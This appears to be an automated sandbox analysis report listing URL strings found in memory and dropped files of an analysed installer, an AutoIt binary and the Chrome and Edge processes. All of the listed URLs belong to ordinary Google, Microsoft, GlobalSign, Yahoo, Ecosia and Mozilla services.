    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2915224736.000002E40037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
    Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
    Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
    Source: 6684V5n83w.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
    Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
    Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
    Source: chrome.exe, 00000011.00000003.2791630004.00002598010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793160754.0000259800F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791789034.0000259800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2794096473.000025980120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791755703.0000259801114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793983935.0000259801134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791725682.00002598010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.0000259800304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2791843371.00002598010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793563199.0000259800FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793252186.0000259800AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Cleveland.9.dr, Evans.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Evans.com, 0000000D.00000000.2217338938.0000000000B95000.00000002.00000001.01000000.00000007.sdmp, Evans.com.2.dr, Entities.9.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: lxlxt0.13.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
    Source: chrome.exe, 00000011.00000003.2804100647.00002598002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
    Source: chromecache_473.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/auth
    Source: chromecache_473.19.drString found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
    Source: chrome.exe, 00000011.00000003.2787742349.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787775067.0000259800AD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786900603.00002598003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2909001356.000002E400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
    Source: chrome.exe, 00000011.00000003.2814425177.0000259801384000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815198308.0000259801460000.00000004.00000800.00020000.00000000.sdmp, chromecache_473.19.dr, chromecache_476.19.drString found in binary or memory: https://apis.google.com
    Source: msedge.exe, 00000015.00000002.2986386086.000001EDF599F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.cn/resolver/
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://assets.msn.com/resolver/
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://bit.ly/wb-precache
    Source: aieukn.13.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
    Source: aieukn.13.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.cn/
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://browser.events.data.msn.com/
    Source: Reporting and NEL.24.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
    Source: 2cc80dabc69f58b6_1.23.drString found in binary or memory: https://c.msn.com/
    Source: lxlxt0.13.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: service_worker_bin_prod.js.23.dr, offscreendocument_main.js.23.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
    Source: Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, Web Data.23.dr, lxlxt0.13.dr, 6xlx4w.13.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
    Source: manifest.json.23.drString found in binary or memory: https://chrome.google.com/webstore/
    Source: chrome.exe, 00000011.00000003.2791053596.0000259800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788876317.0000259800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788277038.0000259800CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793533540.0000259800EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788977368.0000259800EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793379631.0000259800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2790601006.0000259800CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788928061.0000259800CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2799474468.0000259800CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2787695410.0000259800CC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
    Source: chrome.exe, 00000011.00000003.2822666939.0000259801950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
    Source: chrome.exe, 00000011.00000003.2821331354.0000513400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2778056090.000051340071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
    Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
    Source: chrome.exe, 00000011.00000003.2792355991.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2786862206.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2793760947.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788555348.000025980034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2817119685.000025980034C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
    Source: msedge.exe, 00000015.00000002.2987641130.000002E40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.23.drString found in binary or memory: https://chromewebstore.google.com/
    Source: chrome.exe, 00000011.00000003.2774624423.0000327C002F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2774606357.0000327C002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
    Source: chrome.exe, 00000011.00000003.2793657944.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2788298037.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2814485401.0000259800BDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2815410251.0000259800BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2986855820.000002E400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: chromecache_473.19.drString found in binary or memory: https://clients6.google.com
    Source: chromecache_473.19.drString found in binary or memory: https://content.googleapis.com
    Source: aieukn.13.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: aieukn.13.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
    Source: Reporting and NEL.24.drString found in binary or memory: https://deff.nelreports.net/api/report
    Source: Reporting and NEL.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: Reporting and NEL.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
    Source: chrome.exe, 00000011.00000003.2782341674.000025980049C000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.23.drString found in binary or memory: https://docs.google.com/
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
    Source: chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
    Source: chrome.exe, 00000011.00000003.2819523469.000025980180C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2784272725.000025980099C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
    Source: chrome.exe, 00000011.00000003.2819894241.000025980129C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
